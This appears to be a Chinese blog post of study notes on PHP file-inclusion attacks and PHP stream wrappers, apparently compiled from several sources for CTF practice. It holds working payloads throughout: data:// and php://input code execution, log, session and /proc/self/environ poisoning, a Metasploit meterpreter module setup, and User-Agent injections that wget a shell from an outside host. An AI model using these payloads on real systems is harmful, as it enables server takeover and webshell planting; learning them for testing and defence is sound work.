<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  

  
  <title>文件包含_php伪协议 | zhiliya</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="File Inclusion（文件包含）  ![image-20200728093954901](4 文件包含-php伪协议&#x2F;image-20200728093954901.png) 场景 具有相关的文件包含函数。 文件包含函数中存在动态变量，比如 include $file;。 攻击者能够控制该变量，比如$file &#x3D; $_GET[&#39;file&#39;];。  本地文件包含(LFI)">
<meta property="og:type" content="article">
<meta property="og:title" content="文件包含_php伪协议">
<meta property="og:url" content="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/index.html">
<meta property="og:site_name" content="zhiliya">
<meta property="og:description" content="File Inclusion（文件包含）  ![image-20200728093954901](4 文件包含-php伪协议&#x2F;image-20200728093954901.png) 场景 具有相关的文件包含函数。 文件包含函数中存在动态变量，比如 include $file;。 攻击者能够控制该变量，比如$file &#x3D; $_GET[&#39;file&#39;];。  本地文件包含(LFI)">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image004-1573708873987.jpg">
<meta property="og:image" content="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/image-20200728094302000.png">
<meta property="og:image" content="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image008-1573708873987.jpg">
<meta property="og:image" content="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image012-1573708873988.jpg">
<meta property="og:image" content="http://www.2cto.com/uploadfile/2013/0119/20130119021143479.jpg">
<meta property="og:image" content="http://www.2cto.com/uploadfile/2013/0119/20130119021143163.jpg">
<meta property="og:image" content="http://www.2cto.com/uploadfile/2013/0119/20130119021143673.jpg">
<meta property="og:image" content="https://ask.qcloudimg.com/http-save/yehe-2822697/pvk5sylnp1.png?imageView2/2/w/1620">
<meta property="og:image" content="https://ask.qcloudimg.com/http-save/yehe-2822697/b6h1gqd4dx.png?imageView2/2/w/1620">
<meta property="og:image" content="http://www.2cto.com/uploadfile/2013/0119/20130119021143439.jpg">
<meta property="og:image" content="http://www.2cto.com/uploadfile/2013/0119/20130119021143509.jpg">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/12.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/13.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/17.png?raw=true">
<meta property="og:image" content="http://images2015.cnblogs.com/blog/804631/201511/804631-20151116135028890-525890377.jpg">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/18.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/19.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/20.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/21.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/22.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/23.png?raw=true">
<meta property="og:image" content="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/24.png?raw=true">
<meta property="article:published_time" content="2019-11-14T02:36:07.000Z">
<meta property="article:modified_time" content="2020-07-31T11:22:09.116Z">
<meta property="article:author" content="zhiliya">
<meta property="article:tag" content="文件包含">
<meta property="article:tag" content="php伪协议">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="http://yoursite.com/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image004-1573708873987.jpg">
  
    <link rel="alternate" href="/atom.xml" title="zhiliya" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  
<link rel="stylesheet" href="/css/style.css">

<meta name="generator" content="Hexo 4.2.0"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">zhiliya</a>
      </h1>
      
        <h2 id="subtitle-wrap">
          <a href="/" id="subtitle">欢迎访问我的博客</a>
        </h2>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="搜索"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-4 文件包含-php伪协议" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" class="article-date">
  <time datetime="2019-11-14T02:36:07.000Z" itemprop="datePublished">2019-11-14</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/web/">web</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      文件包含_php伪协议
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h1 id="File-Inclusion（文件包含）"><a href="#File-Inclusion（文件包含）" class="headerlink" title="File Inclusion（文件包含）"></a>File Inclusion（文件包含）</h1><img src="/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image004-1573708873987.jpg" alt="img" style="zoom: 150%;">

<p>![image-20200728093954901](4 文件包含-php伪协议/image-20200728093954901.png)</p>
<h2 id="场景"><a href="#场景" class="headerlink" title="场景"></a>场景</h2><ol>
<li>具有相关的文件包含函数。</li>
<li>文件包含函数中存在动态变量，比如 <code>include $file;</code>。</li>
<li>攻击者能够控制该变量，比如<code>$file = $_GET[&#39;file&#39;];</code>。</li>
</ol>
<h3 id="本地文件包含-LFI"><a href="#本地文件包含-LFI" class="headerlink" title="本地文件包含(LFI)"></a>本地文件包含(LFI)</h3><img src="/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/image-20200728094302000.png" alt="image-20200728094302000" style="zoom:80%;">

<h3 id="远程文件包含-RFI"><a href="#远程文件包含-RFI" class="headerlink" title="远程文件包含(RFI)"></a>远程文件包含(RFI)</h3><p>![image-20200728101836227](4 文件包含-php伪协议/image-20200728101836227.png)</p>
<p> 需要php.ini中两个配置均为ON</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen = On</span><br><span class="line">allow_url_include = On 默认为off</span><br></pre></td></tr></table></figure>

<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">    <span class="keyword">if</span>($route == <span class="string">"share"</span>)&#123;</span><br><span class="line">        <span class="keyword">require_once</span> $basePath . <span class="string">'/action/m_share.php'</span>;</span><br><span class="line">    &#125;<span class="keyword">elseif</span>($route == <span class="string">"sharelink"</span>)&#123;</span><br><span class="line">        <span class="keyword">require_once</span> $basePath . <span class="string">'/action/m_sharelink.php'</span>;</span><br><span class="line">    &#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>



<p><img src="/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image008-1573708873987.jpg" alt="img"></p>
<p><img src="/2019/11/14/4%20%E6%96%87%E4%BB%B6%E5%8C%85%E5%90%AB-php%E4%BC%AA%E5%8D%8F%E8%AE%AE/clip_image012-1573708873988.jpg" alt="img"></p>
<p>外部包含文件成功，这样的话我们可以在1.php代码中写入恶意代码，拿到服务器的webshell：<code>http://192.168.217.133/dvwa/vulnerabilities/fi/?page=http://127.0.0.1/1.php</code></p>
<p> 可将远程的shell解析执行，最后一个<strong>问号</strong>或<strong>%00</strong>可以起到截断的作用。</p>
<h2 id="00截断"><a href="#00截断" class="headerlink" title="%00截断"></a>%00截断</h2><p>![image-20200728100137805](4 文件包含-php伪协议/image-20200728100137805.png)</p>
<p>php5.5.0版本后就不行</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">$file = $_GET[<span class="string">'file'</span>];</span><br><span class="line"><span class="keyword">include</span> $file;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>若在同目录下有<code>phpinfo.txt</code>    <code>&lt;?php phpinfo();?&gt;</code> 则访问：</p>
<p> <code>index.php?file=phpinfo.txt</code></p>
<p>即可解析文件内容</p>
<p>PHP内核是由C语言实现的，在连接字符串时，0字节(\x00)将作为字符串结束符。所以可用</p>
<h2 id="路径长度截断"><a href="#路径长度截断" class="headerlink" title="路径长度截断"></a>路径长度截断</h2><p>![image-20200728101324293](4 文件包含-php伪协议/image-20200728101324293.png)</p>
<p>![image-20200728101502613](4 文件包含-php伪协议/image-20200728101502613.png)</p>
<p>点号截断：</p>
<blockquote>
<p>?file=../../../../../../../../../boot.ini/………[…]…………</p>
</blockquote>
<p>php 版本小于 5.2.8 可以成功，只适用 windows，点号需要长于 256</p>
<h2 id="php伪协议-lt-phpinfo-gt"><a href="#php伪协议-lt-phpinfo-gt" class="headerlink" title="php伪协议  &lt;?phpinfo();?&gt;"></a>php伪协议  <code>&lt;?phpinfo();?&gt;</code></h2><p>![image-20200728102417555](4 文件包含-php伪协议/image-20200728102417555.png)</p>
<p>![image-20200728103010885](4 文件包含-php伪协议/image-20200728103010885.png)</p>
<h3 id="file协议-file-可以执行所包含的文件"><a href="#file协议-file-可以执行所包含的文件" class="headerlink" title="file协议  file://   可以执行所包含的文件"></a>file协议  file://   可以执行所包含的文件</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?file=file:<span class="comment">//D:\app\phpstudy_pro\WWW\include\phpinfo.txt</span></span><br></pre></td></tr></table></figure>

<h3 id="php-filter-php-filter-read-convert-base64-encode-resource-只能读取源码-并不能包含执行源码"><a href="#php-filter-php-filter-read-convert-base64-encode-resource-只能读取源码-并不能包含执行源码" class="headerlink" title="php://filter    php://filter/read=convert.base64-encode/resource=  只能读取源码 并不能包含执行源码"></a>php://filter    php://filter/read=convert.base64-encode/resource=  只能读取源码 并不能包含执行源码</h3><figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br></pre></td><td class="code"><pre><span class="line">绝对路径</span><br><span class="line">?file=php:<span class="comment">//filter/read=convert.base64-encode/resource=D:\app\phpstudy_pro\WWW\include\phpinfo.txt</span></span><br><span class="line"><span class="number">00</span>截断</span><br><span class="line">?file=php:<span class="comment">//filter/read=convert.base64-encode/resource=D:\app\phpstudy_pro\WWW\include\phpinfo.txt%00</span></span><br><span class="line">相对路径</span><br><span class="line">?file=php:<span class="comment">//filter/read=convert.base64-encode/resource=phpinfo.txt</span></span><br><span class="line">?file=php:<span class="comment">//filter/read=convert.base64-encode/resource=../1.php</span></span><br><span class="line">远程文件包含</span><br><span class="line">?file=php:<span class="comment">//filter/read=convert.base64-encode/resource=http://127.0.0.1/1.php</span></span><br><span class="line"></span><br><span class="line">?file=php:<span class="comment">//filter/convert.base64-encode/resource=index.php</span></span><br><span class="line">效果跟前面一样，少了read等关键字。在绕过一些waf时也许有用。</span><br><span class="line"></span><br><span class="line">php:<span class="comment">//filter/read=string.rot13</span></span><br><span class="line">指定末尾文件，可以读到base64编码后的文件内容，ctf中常有题目可读文件源码。</span><br><span class="line">?m=php:<span class="comment">//filter/read=string.rot13/resource=home.php</span></span><br></pre></td></tr></table></figure>

<h3 id="php-input-POST-这个post-hackbar用不了-可以执行所包含的文件-可以执行post里面的内容"><a href="#php-input-POST-这个post-hackbar用不了-可以执行所包含的文件-可以执行post里面的内容" class="headerlink" title="php://input   POST     这个post hackbar用不了   可以执行所包含的文件 可以执行post里面的内容"></a>php://input   POST     这个post hackbar用不了   可以执行所包含的文件 可以执行post里面的内容</h3><p> payload:</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">需要：allow_url_include = on </span><br><span class="line">    </span><br><span class="line">?file=php:<span class="comment">//input</span></span><br><span class="line">POST:<span class="meta">&lt;?php</span>info();<span class="meta">?&gt;</span>   没有加php头也可以</span><br><span class="line"><span class="meta">&lt;?php</span> <span class="keyword">echo</span> `ls`<span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>例</p>
<p>![image-20200728192917874](4 文件包含-php伪协议/image-20200728192917874.png)</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">?content=php:<span class="comment">//input               php://input输入流里面算一个文件 </span></span><br><span class="line">POST:I<span class="string">'m glad to learn CTF  没有加php头也可以</span></span><br></pre></td></tr></table></figure>

<h3 id="data-可以执行所包含的文件-可以执行后面的内容"><a href="#data-可以执行所包含的文件-可以执行后面的内容" class="headerlink" title="data://  可以执行所包含的文件 可以执行后面的内容"></a>data://  可以执行所包含的文件 可以执行后面的内容</h3><p>条件：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">allow_url_fopen &#x3D; On</span><br><span class="line">allow_url_include &#x3D; On</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">没有加php头也可以</span><br><span class="line">?file&#x3D;data:text&#x2F;plain,&lt;?phpinfo();?&gt;  去掉&#x2F;&#x2F;也能执行</span><br><span class="line">?file&#x3D;data:&#x2F;&#x2F;text&#x2F;plain,&lt;?phpinfo();?&gt;</span><br><span class="line"></span><br><span class="line">?file&#x3D;data:text&#x2F;plain,&lt;?php phpinfo();?&gt;   此处,不能改为;</span><br><span class="line">?file&#x3D;data:text&#x2F;plain;charset&#x3D;utf-8,&lt;?php phpinfo();?&gt;</span><br><span class="line">00截断</span><br><span class="line">?file&#x3D;data:text&#x2F;plain,&lt;?php phpinfo();?&gt;%00</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">调用php函数执行系统命令 命令执行</span><br><span class="line">?file&#x3D;data:text&#x2F;plain,&lt;?php system(&#39;whoami&#39;);?&gt;</span><br><span class="line">?file&#x3D;data:text&#x2F;plain,&lt;?php echo system(“cat &#x2F;flag”));?&gt;</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">如果对特定字符进行了过滤，比如flag &lt; &gt; ? ( ) 	可以使用base64进行编码</span><br><span class="line">?file&#x3D;data:text&#x2F;plain;base64,ZmxhZy5waHA&#x3D;             flag.php</span><br><span class="line">?file&#x3D;data:text&#x2F;plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b    &lt;?php phpinfo();?&gt;   还真得把+换成%2b 不然url编码会把+去掉</span><br><span class="line">?file&#x3D;data:text&#x2F;plain;base64,PD9waHAgcmVhZGZpbGUoIi4vZmxhZy5waHAiKTs&#x2F;Pg&#x3D;&#x3D;   &lt;?php readfile(&quot;.&#x2F;flag.php&quot;);?&gt;</span><br></pre></td></tr></table></figure>

<h3 id="phar"><a href="#phar" class="headerlink" title="phar ://"></a>phar ://</h3><p>PHP归档，解压缩协议   </p>
<p>php 版本大于等于 php5.3.0</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">上传包含任何格式文件shell的压缩包，再用phar协议解析</span><br><span class="line">指定相对路径</span><br><span class="line">?file&#x3D;phar:&#x2F;&#x2F;shell.zip&#x2F;phpinfo.txt</span><br><span class="line">指定绝对路径</span><br><span class="line">?file&#x3D;phar:&#x2F;&#x2F;D:&#x2F;index&#x2F;www&#x2F;fileinclude&#x2F;shell.zip&#x2F;phpinfo.txt</span><br><span class="line"></span><br><span class="line">上传一个txt ,内容为 &lt;?php echo system(“cat &#x2F;flag”));?&gt;</span><br><span class="line">访问upload.php?file&#x3D;phar:&#x2F;&#x2F;upload&#x2F;........txt  文件包含</span><br></pre></td></tr></table></figure>

<h3 id="zip"><a href="#zip" class="headerlink" title="zip://"></a>zip://</h3><p>需要绝对路径</p>
<p>构造zip包的方法同phar。</p>
<p>但使用zip协议，需要指定绝对路径，同时将<code>#</code>编码为<code>%23</code>，之后填上压缩包内的文件。</p>
<p><code>?file=zip://F:/web/phpStudy/WWW/serialized/okshell.zip%23okshell.png</code></p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line"></span><br><span class="line"> $_GET[&#39;a&#39;]($_GET[&#39;b&#39;]);</span><br><span class="line"></span><br><span class="line">?&gt;</span><br><span class="line">zip:&#x2F;&#x2F;xxx.png%23shell</span><br><span class="line">phar:&#x2F;&#x2F;xxx.png&#x2F;shell</span><br><span class="line">?fp&#x3D;zip:&#x2F;&#x2F;uploads&#x2F;515969bfe90c2f52fbcd7e5818e8688b681eea4e.png%23shell&amp;a&#x3D;system&amp;b&#x3D;ls</span><br></pre></td></tr></table></figure>



<h3 id="compress-bzip2"><a href="#compress-bzip2" class="headerlink" title="compress.bzip2://"></a>compress.bzip2://</h3><p>?file=compress.bzip2://./file.jpg</p>
<p>可执行file.jpg里面代码。</p>
<h3 id="包含日志文件"><a href="#包含日志文件" class="headerlink" title="包含日志文件"></a>包含日志文件</h3><p>先通过读取httpd的配置文件httpd.conf,找日志文件所在目录<br> 常见日志文件位置：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">1...&#x2F;etc&#x2F;httpd&#x2F;conf&#x2F;httpd.conf</span><br><span class="line">\1.   &#x2F;usr&#x2F;local&#x2F;apache&#x2F;conf&#x2F;http.conf</span><br><span class="line"> 3...&#x2F;apache&#x2F;logs&#x2F;error.log</span><br></pre></td></tr></table></figure>

<p>Metasploit有脚本完成自动化攻击</p>
<p>可以包含 httpd.conf 查看日志文件位置以及文件名格式配置，这里就直接找到一个 log 进行利用（php_error.log），该文件会记录 php 在执行中出现的错误，<br><img src="http://www.2cto.com/uploadfile/2013/0119/20130119021143479.jpg" alt="img"><br>图 13.php_error 文件内容<br>所以我们直接访问 test.php?file=../<?php phpinfo ();?>.php，将会被记录下来。这样便成功将 php 代码写进 log 文件。<br>直接访问：<br><img src="http://www.2cto.com/uploadfile/2013/0119/20130119021143163.jpg" alt="img"><br>图 14.get 请求中插入 php 代码<br>返回空白，这是由于 webserver 未开启报错。<br>包含后如图：<br><img src="http://www.2cto.com/uploadfile/2013/0119/20130119021143673.jpg" alt="img"></p>
<p><em>利用条件：</em>需要知道服务器日志的存储路径，且日志文件可读。</p>
<p>很多时候，web 服务器会将请求写入到日志文件中，比如说 apache。在用户发起请求时，会将请求写入 access.log，当发生错误时将错误写入 error.log。默认情况下，日志保存路径在 <code>/var/log/apache2/</code>。</p>
<blockquote>
<p>?file=../../../../../../../../../var/log/apache/error.log</p>
</blockquote>
<p>1、提交如下请求，将 payload 插入日志</p>
<p><img src="https://ask.qcloudimg.com/http-save/yehe-2822697/pvk5sylnp1.png?imageView2/2/w/1620" alt="img"></p>
<p>2、可以尝试利用 UA 插入 payload 到日志文件</p>
<p><img src="https://ask.qcloudimg.com/http-save/yehe-2822697/b6h1gqd4dx.png?imageView2/2/w/1620" alt="img"></p>
<p>3、MSF 攻击模块</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">use exploit/unix/webapp/php_includeset rhost <span class="number">192.168</span><span class="number">.159</span><span class="number">.128</span>set rport <span class="number">80</span>set phpuri /index.php?file=xxLFIxxset path http:<span class="comment">//172.18.176.147/set payload php/meterpreter/bind_tcpset srvport 8888exploit -z</span></span><br></pre></td></tr></table></figure>

<p><strong>日志默认路径</strong></p>
<p>apache+Linux 日志默认路径</p>
<blockquote>
<p>/etc/httpd/logs/access_log</p>
</blockquote>
<p>或者</p>
<blockquote>
<p>/var/log/httpd/access log</p>
</blockquote>
<p>apache+win2003 日志默认路径</p>
<blockquote>
<p>D:/xampp/apache/logs/access.log D:/xampp/apache/logs/error.log</p>
</blockquote>
<p>IIS6.0+win2003 默认日志文件</p>
<blockquote>
<p>C:/WINDOWS/system32/Logfiles</p>
</blockquote>
<p>IIS7.0+win2003 默认日志文件</p>
<blockquote>
<p>%SystemDrive%/inetpub/logs/LogFiles</p>
</blockquote>
<p>nginx 日志文件在用户安装目录的 logs 目录下</p>
<p>如安装目录为 <code>/usr/local/nginx</code>,则日志目录就是在</p>
<blockquote>
<p>/usr/local/nginx/logs</p>
</blockquote>
<p>也可通过其配置文件 Nginx.conf，获取到日志的存在路径</p>
<blockquote>
<p>/opt/nginx/logs/access.log</p>
</blockquote>
<p><strong>web 中间件默认配置</strong></p>
<p>apache+linux 默认配置文件</p>
<blockquote>
<p>/etc/httpd/conf/httpd.conf</p>
</blockquote>
<p>或者</p>
<blockquote>
<p>index.php?page=/etc/init.d/httpd</p>
</blockquote>
<p>IIS6.0+win2003 配置文件</p>
<blockquote>
<p>C:/Windows/system32/inetsrv/metabase.xml</p>
</blockquote>
<p>IIS7.0+WIN 配置文件</p>
<blockquote>
<p>C:/Windows/System32/inetsrv/config/application/Host.config</p>
</blockquote>
<h3 id="包含Session"><a href="#包含Session" class="headerlink" title="包含Session"></a><strong>包含Session</strong></h3><p>利用条件：session文件路径已知，且其中内容部分可控。</p>
<p>姿势：</p>
<p>php的session文件的保存路径可以在phpinfo的session.save_path看到。</p>
<p>常见的php-session存放位置：</p>
<ol>
<li>/var/lib/php/sess_PHPSESSID</li>
<li>/var/lib/php/sess_PHPSESSID</li>
<li>/tmp/sess_PHPSESSID</li>
<li>/tmp/sessions/sess_PHPSESSID</li>
</ol>
<p>session的文件名格式为sess_[phpsessid]。而phpsessid在发送的请求的cookie字段中可以看到。</p>
<p>要包含并利用的话，需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候，可以先包含进session文件，观察里面的内容，然后根据里面的字段来发现可控的变量，从而利用变量来写入payload，并之后再次包含从而执行php代码。</p>
<p>比如这篇文章：<a href="http://kb.hitcon.org/post/165429468072/透過-lfi-引入-php-session-檔案觸發-rce" target="_blank" rel="noopener">透過 LFI 引入 PHP session 檔案觸發 RCE</a></p>
<p><em>利用条件：</em>session 文件路径已知，且其中内容部分可控。</p>
<p>PHP 默认生成的 Session 文件往往存放在 /tmp 目录下</p>
<blockquote>
<p>/tmp/sess_SESSIONID</p>
<p>?file=../../../../../../tmp/sess_tnrdo9ub2tsdurntv0pdir1no7</p>
</blockquote>
<p>session 文件一般在 /tmp 目录下，格式为 <code>sess_[your phpsessid value]</code>，有时候也有可能在 <code>/var/lib/php5</code> 之类的，在此之前建议先读取配置文件。在某些特定的情况下如果你能够控制 session 的值，也许你能够获得一个 shell</p>
<p><strong>包含 /proc/self/environ 文件</strong></p>
<p><em>利用条件：</em></p>
<p>1、php 以 cgi 方式运行，这样 environ 才会保持 UA 头。</p>
<p>2、environ <a href="https://cloud.tencent.com/product/cfs?from=10680" target="_blank" rel="noopener">文件存储</a>位置已知，且 environ 文件可读。</p>
<p><em>姿势：</em></p>
<p><code>proc/self/environ</code> 中会保存 user-agent 头。如果在 user-agent 中插入 php 代码，则 php 代码会被写入到 environ 中。之后再包含它，即可。</p>
<blockquote>
<p>?file=../../../../../../../proc/self/environ</p>
</blockquote>
<p>选择 User-Agent 写代码如下：</p>
<blockquote>
<?system('wget http://www.yourweb.com/oneword.txt -O shell.php');?>
</blockquote>
<p>然后提交请求。</p>
<h3 id="包含-proc-self-environ-文件"><a href="#包含-proc-self-environ-文件" class="headerlink" title="包含/proc/self/environ 文件"></a><strong>包含/proc/self/environ 文件</strong></h3><p><code>index.php?page=../../../../../proc/self/environ</code><br> 可以看到Web进程运行时的环境变量，其中用户可以控制部分，比如对User-Agent注入</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">\<span class="number">1.</span>    <span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line">\<span class="number">2.</span>      system(<span class="string">'wget http://hacker/Shells/phpshell.txt -O shell.php'</span>);</span><br><span class="line"></span><br><span class="line">\<span class="number">3.</span>    <span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>但是用户可通过修改浏览器的 agent 信息插入自己的内容到该文件，将 php 代码写进去之后再利用 LFI 进行包含就可以实现漏洞的利用。<br>首先，验证访问权限，看是否有权限读取该文件内容<br><img src="http://www.2cto.com/uploadfile/2013/0119/20130119021143439.jpg" alt="img"></p>
<h3 id="包含-web-server-日志文件"><a href="#包含-web-server-日志文件" class="headerlink" title="包含 web server 日志文件"></a>包含 web server 日志文件</h3><p>Apache 的日志文件在 LFI 漏洞的利用中是非常常见的。因为不管我们提交的 Get 请求或者 Post 请求都会被 apache 记录到日志文件里。所以我们可以控制请求内容，将恶意代码写入日志文件，从而实现包含。<br>首先：查看是否有权限进行包含<br><img src="http://www.2cto.com/uploadfile/2013/0119/20130119021143509.jpg" alt="img"></p>
<h2 id="包含日志"><a href="#包含日志" class="headerlink" title="包含日志"></a>包含日志</h2><h3 id="访问日志"><a href="#访问日志" class="headerlink" title="访问日志"></a>访问日志</h3><p>利用条件： 需要知道服务器日志的存储路径，且日志文件可读。</p>
<p>姿势：</p>
<p>很多时候，web服务器会将请求写入到日志文件中，比如说apache。在用户发起请求时，会将请求写入access.log，当发生错误时将错误写入error.log。默认情况下，日志保存路径在 /var/log/apache2/。</p>
<p>但如果是直接发起请求，会导致一些符号被编码使得包含无法正确解析。可以使用burp截包后修改。<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/12.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/12.png?raw=true" alt="img"></a></p>
<p>正常的php代码已经写入了 /var/log/apache2/access.log。然后进行包含即可。<br><a href="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/13.png?raw=true" target="_blank" rel="noopener"><img src="https://github.com/CHYbeta/chybeta.github.io/blob/master/images/pic/20171009/13.png?raw=true" alt="img"></a></p>
<p>在一些场景中，log的地址是被修改掉的。你可以通过读取相应的配置文件后，再进行包含。</p>
